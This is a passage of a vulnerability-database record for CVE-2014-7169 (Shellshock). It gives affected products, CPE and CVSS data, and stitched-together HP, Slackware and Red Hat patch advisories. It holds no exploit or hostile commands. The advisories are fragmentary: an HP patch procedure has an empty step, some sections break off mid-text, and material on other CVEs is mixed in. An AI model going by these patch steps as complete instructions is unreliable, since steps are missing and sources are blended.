"model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.129" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.21" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.41" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.14150" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.218" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.05" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.4" }, { "model": "gaia r71.50", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.68" }, { "model": "espace dcm v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.359.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.26" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.205" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.83" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.565.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.3" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.567.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.37586" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.33" }, { "model": "oceanstor cse v100r002c00lsfm01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.238" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.656.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.55" }, { "model": "ip flow manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.53" }, { "model": "b189 ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.022" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1011" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1033.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.788.0" }, { "model": "gaia embedded r70.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.691.0" } ], "sources": [ { "db": "CERT/CC", "id": "VU#252743" }, { "db": "BID", "id": "70154" }, { "db": "NVD", "id": "CVE-2014-7169" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.01:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.05:b:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:3.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:4.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:4.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.01.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.02:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:3.0.16:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:3.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:4.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.02.1:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.03:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.04:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:3.2:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:3.2.48:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.6:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:1.14.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.05:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:2.05:a:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:4.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:gnu:bash:4.0:rc1:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "NVD", "id": "CVE-2014-7169" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "HP", "sources": [ { "db": "PACKETSTORM", "id": "128665" }, { "db": "PACKETSTORM", "id": "130336" }, { "db": "PACKETSTORM", "id": "128753" }, { "db": "PACKETSTORM", "id": "129069" }, { "db": "PACKETSTORM", "id": "131275" }, { "db": "PACKETSTORM", "id": "128546" }, { "db": "PACKETSTORM", "id": "128509" } ], "trust": 0.7 }, "cve": "CVE-2014-7169", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": false, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "NVD", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "trust": 1.0, "userInteractionRequired": false, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULMON", "availabilityImpact": "COMPLETE", "baseScore": 10.0, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 10.0, "id": "CVE-2014-7169", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.1, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "NVD", "id": "CVE-2014-7169", "trust": 1.0, "value": "HIGH" }, { "author": "VULMON", "id": "CVE-2014-7169", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "VULMON", "id": "CVE-2014-7169" }, { "db": "NVD", "id": "CVE-2014-7169" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271. GNU Bash 4.3 and earlier contains a command injection vulnerability that may allow remote code execution. GNU Bash is prone to a local memory-corruption vulnerability. \nAn attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. \nGNU Bash 3.2 and later are vulnerable; prior versions may also be affected. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\nNote: the current version of the following document is available here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\ndocDisplay?docId=emr_na-c04558068\n\nSUPPORT COMMUNICATION - SECURITY BULLETIN\n\nDocument ID: c04558068\nVersion: 1\n\nHPSBMU03246 rev.1 - HP Insight Control for Linux Central Management Server\nPre-boot Execution Environment running Bash Shell, Multiple Vulnerabilities\n\nNOTICE: The information in this Security Bulletin should be acted upon as\nsoon as possible. \n\nRelease Date: 2015-02-02\nLast Updated: 2015-02-02\n\nPotential Security Impact: Multiple vulnerabilities\n\nSource: Hewlett-Packard Company, HP Software Security Response Team\n\nVULNERABILITY SUMMARY\nPotential security vulnerabilities have been identified with HP Insight\nControl for Linux Central Management Server Pre-boot Execution Environment\nthat could be exploited remotely resulting in Denial of Service (DoS),\ndisclosure of information, and other vulnerabilities. \n\nReferences:\n\nCVE-2014-6271\nCVE-2014-6277\nCVE-2014-6278\nCVE-2014-7169\nCVE-2014-7186\nCVE-2014-7187\nCVE-2014-7196\nSSRT101742\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \nHP Insight Control for Linux Central Management Server Pre-boot Execution\nEnvironment running Bash Shell\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2014-6271 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-6277 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-6278 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-7169 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-7186 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-7187 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\nCVE-2014-7196 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following instructions to resolve these vulnerabilities. \n\nFollow these steps to update the HP Insight Control for Linux Central\nManagement Server Pre-boot Execution Environment:\n\nNOTE: The following procedure updates the bash shell on the Linux Pre-boot\nExecution Environment. Please update the Bash shell version on the HP Insight\nControl for Linux Central Management Server also. On the Production RHEL 6.2 OS:\n\na. Prepare temporary directory for Bash update software:\n\n# mkdir -p $HOME/tmp/bash\n# cd $HOME/tmp/bash\n# pwd\n\u003chome directory\u003e/tmp/bash\n\nb. \n\nc. Extract the Bash update software package. \n\n# rpm2cpio bash-4.1.2-15.el6_4.2.i686.rpm| cpio -idmv\n\nd. Verify the version of the Bash update software:\n\n# ./bin/bash --version\nGNU bash, version 4.1.2(1)-release (i686-redhat-linux-gnu)\n\ne. Verify version dependencies:\n\n# ldd ./bin/bash\n\nlinux-gate.so.1 =\u003e (0x008a7000)\nlibtinfo.so.5 =\u003e /lib/libtinfo.so.5 (0x00459000)\nlibdl.so.2 =\u003e /lib/libdl.so.2 (0x002c0000)\nlibc.so.6 =\u003e /lib/libc.so.6 (0x0012e000)\n/lib/ld-linux.so.2 (0x00108000)\n\nf. Create archive file from \u0027/lib\u0027 to copy and install on the Insight Control\nfor Linux Central Management Server Pre-boot Execution Environment system:\n\n# mkdir $HOME/tmp/lib\n# cd /lib\n# cp * $HOME/tmp/lib\n# cd $HOME/tmp\n# pwd\n\u003chome directory\u003e/tmp\n# tar cvf bash_lib.tar *\n\n2. Download the new archive file \u0027$HOME/tmp/bash_lib.tar\u0027 from the Production\nRHEL 6.2 OS system to the Insight Control for Linux Central Management Server\nPre-boot Execution Environment system. On the HP Insight Control for Linux Central Managment Server Pre-boot\nExecution Environment system:\n\na. Create a temporary folder for the toolkit and copy the toolkit there :\n\n# mkdir -p $HOME/tmp/temp-toolkit\n# cp /usr/share/systemimager/boot/i386/standard/toolkit.tar.gz\n$HOME/tmp/temp-toolkit\n\nb. Extract the file \u0027toolkit.tar.gz\u0027 into the temporary folder:\n\n# cd $HOME/tmp/temp-toolkit\n# tar zxvf toolkit.tar.gz\n# mv $HOME/tmp/temp-toolkit/toolkit.tar.gz /tmp\n\nc. Verify the version of the toolkit Bash:\n\n# $HOME/tmp/temp-toolkit/bin/bash --version\nGNU bash, version 3.2.0(1)-release (i386-pc-linux-gnu) Copyright (C) 2005\nFree Software Foundation, Inc. \n\nd. Verify dependencies versions:\n\n# ldd $HOME/tmp/temp-toolkit/bin/bash\n\nlinux-gate.so.1 =\u003e (0xffffe000)\nlibtermcap.so.2 =\u003e /lib/libtermcap.so.2 (0xf7f8c000)\nlibdl.so.2 =\u003e /lib/libdl.so.2 (0x008bf000)\nlibc.so.6 =\u003e /lib/libc.so.6 (0x00777000)\n/lib/ld-linux.so.2 (0x00755000)\n\ne. Extract the archive \u0027bash_lib.tar\u0027 to directory \u0027$HOME/tmp/bash_lib\u0027 . \nThen copy the bash binary and the library files to their respective\nlocations:\n\n# tar xvf $HOME/tmp/bash_lib\n# cp $HOME/tmp/bash_lib/bash/bash $HOME/tmp/temp-toolkit/bin\n# cp $HOME/tmp/bash_lib/lib/* $HOME/tmp/temp-toolkit/lib\n\nf. Create the updated toolkit gzipped archive file and place in\n/usr/share/systemimager/boot/i386/standard\n\n# tar czvf toolkit.tar.gz *\n# cp toolkit.tar.gz /usr/share/systemimager/boot/i386/standard\n\nHISTORY\nVersion:1 (rev.1) - 2 February 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n\nThis vulnerability allows users that have been granted access to a shell\nscript to escalate privilege and execute unrestricted commands at the same\nsecurity level as the Bash script. \n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n+--------------------------+\npatches/packages/bash-4.2.048-i486-2_slack14.1.txz: Rebuilt. \n Patched an additional trailing string processing vulnerability discovered\n by Tavis Ormandy. \n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169\n (* Security fix *)\n+--------------------------+\n\n\nWhere to find the new packages:\n+-----------------------------+\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you. \n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bash-3.1.018-i486-2_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bash-3.1.018-x86_64-2_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bash-4.1.012-i486-2_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bash-4.1.012-x86_64-2_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bash-4.1.012-i486-2_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bash-4.1.012-x86_64-2_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bash-4.2.048-i486-2_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bash-4.2.048-x86_64-2_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bash-4.2.048-i486-2_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bash-4.2.048-x86_64-2_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/a/bash-4.3.025-i486-2.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/a/bash-4.3.025-x86_64-2.txz\n\n\nMD5 signatures:\n+-------------+\n\nSlackware 13.0 package:\n93780575208505d17b5305b202294e16 bash-3.1.018-i486-2_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n6ec269c8e958cd6265821b480af8e5d7 bash-3.1.018-x86_64-2_slack13.0.txz\n\nSlackware 13.1 package:\n21235413470903bb8eec907acb5b3248 bash-4.1.012-i486-2_slack13.1.txz\n\nSlackware x86_64 13.1 package:\ne69bacaf484e8f924c09eacd91c8c737 bash-4.1.012-x86_64-2_slack13.1.txz\n\nSlackware 13.37 package:\nfa05abe5c8d6557ec1cef124e5d877ce bash-4.1.012-i486-2_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n97a0005c1e0701c8912dc30f8a6f2908 bash-4.1.012-x86_64-2_slack13.37.txz\n\nSlackware 14.0 package:\nd319186a0ab7e85562684669afc878c3 bash-4.2.048-i486-2_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n8835dc729d6029fc20b6b1b1df72ce13 bash-4.2.048-x86_64-2_slack14.0.txz\n\nSlackware 14.1 package:\nfbb4b906de3a8f9bf5209fcc80e2a413 bash-4.2.048-i486-2_slack14.1.txz\n\nSlackware x86_64 14.1 package:\na786b69705d1ebb67fbf31df9d032699 bash-4.2.048-x86_64-2_slack14.1.txz\n\nSlackware -current package:\nbba7e4260df8c4d91d99dbf13d44ec79 a/bash-4.3.025-i486-2.txz\n\nSlackware x86_64 -current package:\n7c9a285415bd636469da0cf405bb5692 a/bash-4.3.025-x86_64-2.txz\n\n\nInstallation instructions:\n+------------------------+\n\nUpgrade the package as root:\n# upgradepkg bash-4.2.048-i486-2_slack14.1.txz\n\n\n+-----+\n\nSlackware Linux Security Team\nhttp://slackware.com/gpg-key\nsecurity@slackware.com\n\n+------------------------------------------------------------------------+\n| To leave the slackware-security mailing list: |\n+------------------------------------------------------------------------+\n| Send an email to majordomo@slackware.com with this text in the body of |\n| the email message: |\n| |\n| unsubscribe slackware-security |\n| |\n| You will get a confirmation message back containing instructions to |\n| complete the process. Please do not reply to this email address. \n\n HP Product\n Firmware Version\n\n HP StoreEver ESL G3 Tape Libraries with MCB version 2\n 680H_GS40701\n\n HP StoreEver ESL G3 Tape Libraries with MCB version 1\n 656H_GS10801\n\n The firmware is customer installable and is available in the Drivers,\nSoftware \u0026 Firmware section at the following location:\n\n http://www.hp.com/support/eslg3\n\n Notes:\n\n - Updating the library firmware requires a reboot of the library. \n\nMitigation Instructions\n\n HP recommends the following mitigation steps to reduce the risk of this\nvulnerability for HP StoreEver ESL G3 Tape Library. \n - The SSLv3 vulnerability known as \"Padding Oracle on Downgraded Legacy\nEncryption\" also known as \"Poodle\", which could be exploited remotely\nresulting in disclosure of information. \n\nReferences:\n CVE-2014-0224\n Heartbleed - Remote Unauthorized Access, Disclosure of Information\n\n CVE-2014-3566\n POODLE - Remote Disclosure of Information\n\n CVE-2014-6271\n Shellshock - Remote Code Execution\n\n CVE-2014-7169\n Shellshock - Remote Code Execution\n\n SSRT101835\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n HP 3PAR Service Processor (SP) versions prior to SP-4.1.0.GA-97.P011,\nSP-4.2.0.GA-29.P003, and SP-4.3.0.GA-17.P001. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Important: bash security update\nAdvisory ID: RHSA-2014:1311-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2014-1311.html\nIssue date: 2014-09-26\nCVE Names: CVE-2014-7169 CVE-2014-7186 CVE-2014-7187 \n=====================================================================\n\n1. Summary:\n\nUpdated bash packages that fix one security issue are now available for Red\nHat Enterprise Linux 4 Extended Life Cycle Support, Red Hat Enterprise\nLinux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support,\nRed Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat\nEnterprise Linux 6.4 Extended Update Support. \n\nRed Hat Product Security has rated this update as having Important security\nimpact. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available from the CVE link in the\nReferences section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AS (v. 4 ELS) - i386, ia64, x86_64\nRed Hat Enterprise Linux AUS (v. 6.2 server) - x86_64\nRed Hat Enterprise Linux Compute Node Optional EUS (v. 6.4) - x86_64\nRed Hat Enterprise Linux ES (v. 4 ELS) - i386, x86_64\nRed Hat Enterprise Linux EUS (v. 5.9 server) - i386, ia64, ppc, s390x, x86_64\nRed Hat Enterprise Linux HPC Node EUS (v. 6.4) - x86_64\nRed Hat Enterprise Linux LL (v. 5.6 server) - i386, ia64, x86_64\nRed Hat Enterprise Linux Server EUS (v. 6.4) - i386, ppc64, s390x, x86_64\nRed Hat Enterprise Linux Server Optional AUS (v. 6.2) - x86_64\nRed Hat Enterprise Linux Server Optional EUS (v. 6.4) - i386, ppc64, s390x, x86_64\n\n3. Description:\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux. \n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still\nallowed certain characters to be injected into other environments via\nspecially crafted environment variables. An attacker could potentially use\nthis flaw to override or bypass environment restrictions to execute shell\ncommands. Certain services and applications allow remote unauthenticated\nattackers to provide environment variables, allowing them to exploit this\nissue. (CVE-2014-7169)\n\nApplications which directly create Bash functions as environment variables\nneed to be made aware of the changes to the way names are handled by this\nupdate. For more information see the Knowledgebase article at\nhttps://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use \"yum update\" within their containers,\nand to commit the resulting changes. \n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the\naforementioned Knowledgebase article. \n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata \nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at \nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for CVE-2014-6271)\n\n6. Package List:\n\nRed Hat Enterprise Linux AS (v. 4 ELS):\n\nSource:\nbash-3.0-27.el4.4.src.rpm\n\ni386:\nbash-3.0-27.el4.4.i386.rpm\nbash-debuginfo-3.0-27.el4.4.i386.rpm\n\nia64:\nbash-3.0-27.el4.4.i386.rpm\nbash-3.0-27.el4.4.ia64.rpm\nbash-debuginfo-3.0-27.el4.4.i386.rpm\nbash-debuginfo-3.0-27.el4.4.ia64.rpm\n\nx86_64:\nbash-3.0-27.el4.4.x86_64.rpm\nbash-debuginfo-3.0-27.el4.4.x86_64.rpm\n\nRed Hat Enterprise Linux ES (v. 4 ELS):\n\nSource:\nbash-3.0-27.el4.4.src.rpm\n\ni386:\nbash-3.0-27.el4.4.i386.rpm\nbash-debuginfo-3.0-27.el4.4.i386.rpm\n\nx86_64:\nbash-3.0-27.el4.4.x86_64.rpm\nbash-debuginfo-3.0-27.el4.4.x86_64.rpm\n\nRed Hat Enterprise Linux LL (v. 5.6 server):\n\nSource:\nbash-3.2-24.el5_6.2.src.rpm\n\ni386:\nbash-3.2-24.el5_6.2.i386.rpm\nbash-debuginfo-3.2-24.el5_6.2.i386.rpm\n\nia64:\nbash-3.2-24.el5_6.2.i386.rpm\nbash-3.2-24.el5_6.2.ia64.rpm\nbash-debuginfo-3.2-24.el5_6.2.i386.rpm\nbash-debuginfo-3.2-24.el5_6.2.ia64.rpm\n\nx86_64:\nbash-3.2-24.el5_6.2.x86_64.rpm\nbash-debuginfo-3.2-24.el5_6.2.x86_64.rpm\n\nRed Hat Enterprise Linux EUS (v. 5.9 